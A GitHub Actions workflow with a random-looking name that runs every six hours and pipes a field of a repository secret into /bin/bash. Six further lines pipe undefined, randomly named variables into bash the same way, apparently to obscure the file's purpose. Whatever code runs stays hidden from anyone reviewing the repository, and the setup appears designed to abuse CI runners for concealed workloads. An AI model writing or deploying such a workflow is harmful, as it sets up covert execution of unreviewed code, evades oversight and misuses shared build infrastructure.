name: tengyuxi3412
on:
  workflow_dispatch:
  schedule:
    - cron: '35 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: tengyuxi3412
        env:
          p1: ${{ secrets.p1 }}
        run: |
          echo $p1 | jq -r .zf30 | /bin/bash
          echo $uvoe443 | jq -r .bicw7602 | /bin/bash
          echo $whh9244 | jq -r .jek4 | /bin/bash
          echo $sield94162 | jq -r .wkcw7 | /bin/bash
          echo $x93 | jq -r .dna50 | /bin/bash
          echo $fm0614 | jq -r .ojmne765 | /bin/bash
          echo $dtfsm428 | jq -r .pqdl0 | /bin/bash

